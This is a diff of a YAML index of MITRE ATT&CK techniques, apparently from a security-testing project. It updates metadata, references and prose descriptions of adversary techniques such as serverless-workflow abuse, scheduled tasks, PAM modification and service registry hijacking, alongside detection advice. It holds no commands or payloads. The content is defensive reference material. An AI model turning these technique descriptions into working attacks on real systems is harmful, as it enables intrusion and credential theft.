       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.003
     atomic_tests: []
   T1651:
     technique:
-      modified: '2024-04-12T03:27:48.171Z'
+      modified: '2024-10-15T13:42:42.543Z'
       name: Cloud Administration Command
       description: |-
         Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -26413,11 +26785,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:43:27.104Z'
       name: 'Command and Scripting Interpreter: Visual Basic'
       description: |-
         Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -26482,14 +26853,13 @@ execution:
         url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.005
     atomic_tests: []
   T1648:
     technique:
-      modified: '2024-03-05T16:13:38.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Serverless Execution
       description: "Adversaries may abuse serverless computing, integration, and automation
         services to execute arbitrary code in cloud environments. Many cloud providers
@@ -26510,14 +26880,19 @@ execution:
         an adversary may create a Lambda function that automatically adds [Additional
         Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
         and a corresponding CloudWatch events rule that invokes that function whenever
-        a new user is created.(Citation: Backdooring an AWS account) Similarly, an
-        adversary may create a Power Automate workflow in Office 365 environments
-        that forwards all emails a user receives or creates anonymous sharing links
-        whenever a user is granted access to a document in SharePoint.(Citation: Varonis
-        Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+        a new user is created.(Citation: Backdooring an AWS account) This is also
+        possible in many cloud-based office application suites. For example, in Microsoft
+        365 environments, an adversary may create a Power Automate workflow that forwards
+        all emails a user receives or creates anonymous sharing links whenever a user
+        is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+        Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+        environments, they may instead create an Apps Script that exfiltrates a user's
+        data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+        OWN-CERT Google App Script 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
       - Praetorian
@@ -26526,16 +26901,18 @@ execution:
       - Varonis Threat Labs
       - Alex Soler, AttackIQ
       - Vectra AI
+      - OWN
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'Application Log: Application Log Content'
@@ -26561,6 +26938,14 @@ execution:
         description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
           Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
         url: https://www.varonis.com/blog/power-automate-data-exfiltration
+      - source_name: Cloud Hack Tricks GWS Apps Script
+        description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+          2024.
+        url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+      - source_name: OWN-CERT Google App Script 2024
+        description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+          analysis. Retrieved October 2, 2024.
+        url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
       - source_name: Cado Security Denonia
         description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
           Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -26575,29 +26960,10 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
-      type: attack-pattern
-      created: '2020-03-11T14:43:31.706Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1204.001
-        url: https://attack.mitre.org/techniques/T1204/001
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-10T16:40:03.786Z'
       name: Malicious Link
       description: An adversary may rely upon a user clicking a malicious link in
         order to gain execution. Users may be subjected to social engineering to get
@@ -26610,25 +26976,41 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
 
         Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+      created: '2020-03-11T14:43:31.706Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1204/001
+        external_id: T1204.001
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1569.002:
     technique:
-      modified: '2023-08-14T15:53:00.999Z'
+      modified: '2024-10-15T16:41:40.247Z'
       name: 'System Services: Service Execution'
       description: |-
         Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).
@@ -26678,17 +27060,16 @@ execution:
         url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1569.002
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -26751,7 +27132,7 @@ execution:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -26785,8 +27166,8 @@ execution:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -26795,6 +27176,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -26807,29 +27192,29 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
 persistence:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -26876,7 +27261,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -26908,8 +27293,8 @@ persistence:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -26923,6 +27308,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -26935,16 +27324,19 @@ persistence:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -27007,7 +27399,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037:
     technique:
@@ -27072,49 +27463,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -27129,20 +27481,57 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1574.007:
@@ -27232,7 +27621,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -27320,7 +27708,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -27405,11 +27792,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -27487,7 +27873,6 @@ persistence:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1546.006:
@@ -27520,7 +27905,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -27543,11 +27928,10 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -27605,9 +27989,8 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1542.001:
@@ -27688,12 +28071,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -27712,7 +28094,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -27726,7 +28107,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -27753,8 +28133,8 @@ persistence:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -27785,7 +28165,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -27842,11 +28223,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
